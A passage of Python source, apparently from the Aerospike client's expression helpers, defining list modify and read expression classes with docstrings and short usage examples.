bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if length of list bin "a" is > 5 after appending 1 item.
expr = exp.GT(
exp.ListSize(None, exp.ListAppend(None, None, 3, exp.ListBin("a"))),
5).compile()
"""
self._children = (
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListAppendItems(_BaseExpr):
"""Create an expression that appends a list of items to the end of a list."""
_op = aerospike.OP_LIST_APPEND_ITEMS
def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
value (TypeValue): List or list expression of items to be appended.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if length of list bin "a" is > 5 after appending multiple items.
expr = exp.GT(
exp.ListSize(None, exp.ListAppendItems(None, None, [3, 2], exp.ListBin("a"))),
5).compile()
"""
self._children = (
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListInsert(_BaseExpr):
"""Create an expression that inserts value to specified index of list."""
_op = aerospike.OP_LIST_INSERT
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Target index for insertion, integer or integer expression.
value (TypeValue): Value or value expression to be inserted.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if list bin "a" has length > 5 after insert.
expr = exp.GT(
exp.ListSize(None, exp.ListInsert(None, None, 0, 3, exp.ListBin("a"))),
5).compile()
"""
self._children = (
index,
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListInsertItems(_BaseExpr):
"""Create an expression that inserts each input list item starting at specified index of list."""
_op = aerospike.OP_LIST_INSERT_ITEMS
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, values: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Target index where item insertion will begin, integer or integer expression.
values (TypeListValue): List or list expression of items to be inserted.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if list bin "a" has length > 5 after inserting items.
expr = exp.GT(
exp.ListSize(None, exp.ListInsertItems(None, None, 0, [4, 7], exp.ListBin("a"))),
5).compile()
"""
self._children = (
index,
values,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListIncrement(_BaseExpr):
"""Create an expression that increments list[index] by value."""
_op = aerospike.OP_LIST_INCREMENT
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Index of value to increment.
value (TypeValue): Value or value expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if incremented value in list bin "a" is the largest in the list.
expr = exp.Eq(
exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, -1, #rank of -1 == largest element.
exp.ListIncrement(None, None, 1, 5, exp.ListBin("a"))),
exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 1,
exp.ListIncrement(None, None, 1, 5, exp.ListBin("a")))
).compile()
"""
self._children = (
index,
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListSet(_BaseExpr):
"""Create an expression that sets item value at specified index in list."""
_op = aerospike.OP_LIST_SET
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): index of value to set.
value (TypeValue): value or value expression to set index in list to.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Get smallest element in list bin "a" after setting index 1 to 10.
expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0,
exp.ListSet(None, None, 1, 10, exp.ListBin("a"))).compile()
"""
self._children = (
index,
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListClear(_BaseExpr):
"""Create an expression that removes all items in a list."""
_op = aerospike.OP_LIST_CLEAR
def __init__(self, ctx: TypeCTX, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Clear list value of list nested in list bin "a" index 1.
from aerospike_helpers import cdt_ctx
expr = exp.ListClear([cdt_ctx.cdt_ctx_list_index(1)], "a").compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListSort(_BaseExpr):
"""Create an expression that sorts a list."""
_op = aerospike.OP_LIST_SORT
def __init__(self, ctx: TypeCTX, order: int, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
order (int): Optional flags modifiying the behavior of list_sort. This should be constructed by bitwise or'ing together values from :ref:`aerospike_list_sort_flag`.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get value of sorted list bin "a".
expr = exp.ListSort(None, aerospike.LIST_SORT_DEFAULT, "a").compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {_Keys.LIST_ORDER_KEY: order}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValue(_BaseExpr):
"""Create an expression that removes list items identified by value."""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE
def __init__(self, ctx: TypeCTX, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Value or value expression to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# See if list bin "a", with `3` removed, is equal to list bin "b".
expr = exp.Eq(exp.ListRemoveByValue(None, 3, exp.ListBin("a")), ListBin("b")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueList(_BaseExpr):
"""Create an expression that removes list items identified by values."""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE_LIST
def __init__(self, ctx: TypeCTX, values: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
values (TypeListValue): List of values or list expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove elements with values [1, 2, 3] from list bin "a".
expr = exp.ListRemoveByValueList(None, [1, 2, 3], exp.ListBin("a")).compile()
"""
self._children = (
values,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRange(_BaseExpr):
""" Create an expression that removes list items identified by value range
(begin inclusive, end exclusive). If begin is None, the range is less than end.
If end is None, the range is greater than or equal to begin.
"""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE_RANGE
def __init__(self, ctx: TypeCTX, begin: TypeValue, end: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
begin (TypeValue): Begin value or value expression for range.
end (TypeValue): End value or value expression for range.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove list of items with values >= 3 and < 7 from list bin "a".
expr = exp.ListRemoveByValueRange(None, 3, 7, exp.ListBin("a")).compile()
"""
self._children = (
begin,
end,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRelRankToEnd(_BaseExpr):
"""Create an expression that removes list items nearest to value and greater by relative rank."""
_op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE_TO_END
def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Start value or value expression.
rank (TypeRank): Rank integer or integer expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove elements larger than 4 by relative rank in list bin "a".
expr = exp.ListRemoveByValueRelRankToEnd(None, 4, 1, exp.ListBin("a")).compile()
"""
self._children = (
value,
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRelRankRange(_BaseExpr):
""" Create an expression that removes list items nearest to value and greater by relative rank with a
count limit.
"""
_op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE
def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Start value or value expression.
rank (TypeRank): Rank integer or integer expression.
count (TypeCount): How many elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# After removing the 3 elements larger than 4 by relative rank, does list bin "a" include 9?.
expr = exp.GT(
exp.ListGetByValue(None, aerospike.LIST_RETURN_COUNT, 9,
exp.ListRemoveByValueRelRankRange(None, 4, 1, 0, exp.ListBin("a"))),
0).compile()
"""
self._children = (
value,
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndex(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified index."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX
def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Index integer or integer expression of element to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get size of list bin "a" after index 3 has been removed.
expr = exp.ListSize(None, exp.ListRemoveByIndex(None, 3, exp.ListBin("a"))).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndexRangeToEnd(_BaseExpr):
"""Create an expression that removes list items starting at specified index to the end of list."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE_TO_END
def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Starting index integer or integer expression of elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove all elements starting from index 3 in list bin "a".
expr = exp.ListRemoveByIndexRangeToEnd(None, 3, exp.ListBin("a")).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndexRange(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified index."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE
def __init__(self, ctx: TypeCTX, index: TypeIndex, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Starting index integer or integer expression of elements to remove.
count (TypeCount): Integer or integer expression, how many elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get size of list bin "a" after index 3, 4, and 5 have been removed.
expr = exp.ListSize(None, exp.ListRemoveByIndexRange(None, 3, 3, exp.ListBin("a"))).compile()
"""
self._children = (
index,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRank(_BaseExpr):
"""Create an expression that removes list item identified by rank."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK
def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove smallest value in list bin "a".
expr = exp.ListRemoveByRank(None, 0, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRankRangeToEnd(_BaseExpr):
"""Create an expression that removes list items starting at specified rank to the last ranked item."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE_TO_END
def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to start removing at.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove the 2 largest elements from List bin "a".
expr = exp.ListRemoveByRankRangeToEnd(None, -2, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRankRange(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified rank."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE
def __init__(self, ctx: TypeCTX, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to start removing at.
count (TypeCount): Count integer or integer expression of elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove the 3 smallest items from list bin "a".
expr = exp.ListRemoveByRankRange(None, 0, 3, exp.ListBin("a")).compile()
"""
self._children = (
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
#######################
# List Read Expressions
#######################
class ListSize(_BaseExpr):
"""Create an expression that returns list size."""
_op = aerospike.OP_LIST_SIZE
def __init__(self, ctx: TypeCTX, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Integer expression.
Example::
#Take the size of list bin "a".
expr = exp.ListSize(None, exp.ListBin("a")).compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValue(_BaseExpr):
""" Create an expression that selects list items identified by value and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeValue): Value or value expression of element to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the index of the element with value, 3, in list bin "a".
expr = exp.ListGetByValue(None, aerospike.LIST_RETURN_INDEX, 3, exp.ListBin("a")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRange(_BaseExpr):
""" Create an expression that selects list items identified by value range and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE_RANGE
def __init__(
self,
ctx: TypeCTX,
return_type: int,
value_begin: TypeValue,
value_end: TypeValue,
bin: TypeBinName
):
""" Create an expression that selects list items identified by value range and returns selected
data specified by return_type.
Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value_begin (TypeValue): Value or value expression of first element to get.
value_end (TypeValue): Value or value expression of ending element.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get rank of values between 3 (inclusive) and 7 (exclusive) in list bin "a".
expr = exp.ListGetByValueRange(None, aerospike.LIST_RETURN_RANK, 3, 7, exp.ListBin("a")).compile()
"""
self._children = (
value_begin,
value_end,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueList(_BaseExpr):
""" Create an expression that selects list items identified by values and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE_LIST
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeListValue): List or list expression of values of elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
#Get the indexes of the the elements in list bin "a" with values [3, 6, 12].
expr = exp.ListGetByValueList(None, aerospike.LIST_RETURN_INDEX, [3, 6, 12], exp.ListBin("a")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRelRankRangeToEnd(_BaseExpr):
"""Create an expression that selects list items nearest to value and greater by relative rank"""
_op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL_TO_END
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeValue): Value or vaule expression to get items relative to.
rank (TypeRank): Rank intger expression. rank relative to "value" to start getting elements.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the values of all elements in list bin "a" larger than 3.
expr = exp.ListGetByValueRelRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 3, 1, exp.ListBin("a")).compile()
"""
self._children = (
value,
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRelRankRange(_BaseExpr):
    """ Create an expression that selects list items nearest to value and greater by relative rank with a
        count limit and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL

    def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value (TypeValue): Value or value expression to get items relative to.
            rank (TypeRank): Rank integer expression; rank relative to "value" at which to start getting elements.
            count (TypeCount): Integer value or integer value expression, how many elements to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the next 2 values in list bin "a" larger than 3.
            expr = exp.ListGetByValueRelRankRange(None, aerospike.LIST_RETURN_VALUE, 3, 1, 2, exp.ListBin("a")).compile()
        """
        # Accept either a prebuilt expression node or a raw bin name.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, rank, count, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByIndex(_BaseExpr):
    """ Create an expression that selects list item identified by index
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_INDEX

    def __init__(self, ctx: TypeCTX, return_type: int, value_type: int, index: TypeIndex, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value_type (int): The value type that will be returned by this expression (ResultType).
            index (TypeIndex): Integer or integer expression of index to get element at.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the value at index 0 in list bin "a". (assume this value is an integer)
            expr = exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0, exp.ListBin("a")).compile()
        """
        # Accept either a prebuilt expression node or a raw bin name.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, bin_expr)
        fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByIndexRangeToEnd(_BaseExpr):
    """ Create an expression that selects list items starting at specified index to the end of list
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_INDEX_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            index (TypeIndex): Integer or integer expression of index to start getting elements at.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get element 5 to end from list bin "a".
            expr = exp.ListGetByIndexRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 5, exp.ListBin("a")).compile()
        """
        # Accept either a prebuilt expression node or a raw bin name.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByIndexRange(_BaseExpr):
    """ Create an expression that selects "count" list items starting at specified index
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_INDEX_RANGE

    def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            index (TypeIndex): Integer or integer expression of index to start getting elements at.
            count (TypeCount): Integer or integer expression for count of elements to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get elements at indexes 3, 4, 5, 6 in list bin "a".
            expr = exp.ListGetByIndexRange(None, aerospike.LIST_RETURN_VALUE, 3, 4, exp.ListBin("a")).compile()
        """
        # Accept either a prebuilt expression node or a raw bin name.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, count, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByRank(_BaseExpr):
    """ Create an expression that selects list item identified by rank
        and returns selected data specified by return_type.
    """
